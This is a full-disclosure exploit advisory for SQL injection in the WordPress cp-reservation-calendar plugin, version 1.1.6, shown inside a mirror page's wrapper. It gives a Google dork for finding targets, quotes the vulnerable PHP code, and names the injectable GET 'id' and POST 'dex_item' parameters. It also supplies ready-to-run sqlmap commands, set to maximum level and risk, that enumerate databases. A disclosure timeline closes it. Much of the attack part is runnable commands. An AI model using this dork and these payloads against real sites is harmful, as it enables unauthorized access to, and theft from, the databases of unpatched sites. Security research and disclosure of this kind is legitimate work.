扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 |
# Exploit Title: WordPress: cp-reservation-calendar 1.1.6SQLi injection] # Date: 2015-09-15 # Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/ # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Software Link: https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip # Version: 1.1.6 # OWASP Top10: A1-Injection A vulnerability has been detected in the WordPress cp reservation calendar Plugin v1.6. The vulnerability allows remote attackers to inject SQL commands. The sql injection vulnerability is located in the <code>dex_reservations.php</code> file. Remote attackers are able to execute own sql commands by manipulation of requested parameters. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6. Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. ============================ vulnerable function code... ============================ function dex_reservations_calendar_load2() { global $wpdb; if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' ) return; @ob_clean(); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Pragma: no-cache"); //following line is vulnerable... $calid = str_replace(TDE_RESERVATIONCAL_PREFIX, "",$_GET["id"]); $query = "SELECT * FROM ".TDE_RESERVATIONCALENDAR_DATA_TABLE." where ".TDE_RESERVATIONDATA_IDCALENDAR."='".$calid."'"; $row_array = $wpdb->get_results($query,ARRAY_A); foreach ($row_array as $row) { $d1 =date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S])); $d2 =date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E])); echo $d1."-".$d2."\n"; echo $row[TDE_RESERVATIONDATA_TITLE]."\n"; echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n"; } exit(); } The following URL executes vulnerable function: http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1 ------------------------------------------------------------------------------------ POC using sqlmap tool:::: python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1" -p id --level=5 --risk=3 --dbms="MySQL" --dbs ########################################################################## The following URL is too vulnerable http://localhost/wordpress/?action=dex_reservations_check_posted_data post parameters:::: ------------------------------------- dex_reservations_post=1&dex_item=1 ------------------------------------ An unauthenticated user can use the following URL to inject malicious SQL code. [dex_item] on POST parameter is vulnerable ====================== vulnerable code ===================== is located in <code>dex_reservations.php function code.. function dex_reservations_get_option ($field, $default_value) { global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id; if ($dex_option_buffered_id == CP_CALENDAR_ID) $value = $dex_option_buffered_item->$field; else { $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID ); $value = $myrows[0]->$field; $dex_option_buffered_item = $myrows[0]; $dex_option_buffered_id= CP_CALENDAR_ID; } if ($value == '' && $dex_option_buffered_item->calendar_language == '') $value = $default_value; return $value; } When this function is called the defined CP_CALENDAR_ID must contains an integer but it isn't validating the parameter [ CP_CALENDAR_ID ] ---------------------------------------------------------------------------- POC using sqlmap tool:::: python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_check_posted_data" --data="dex_reservations_post=1&dex_item=1" -p dex_item --dbms="MySQL" --level=5 --risk=3 ############# time-line 2015-03-01: vulnerability found 2015-03-09: reported to vendor 2015-03-21-: released cp_reservation_calendar v1.1.7 2015-09-15: full disclosure |
体验盒子
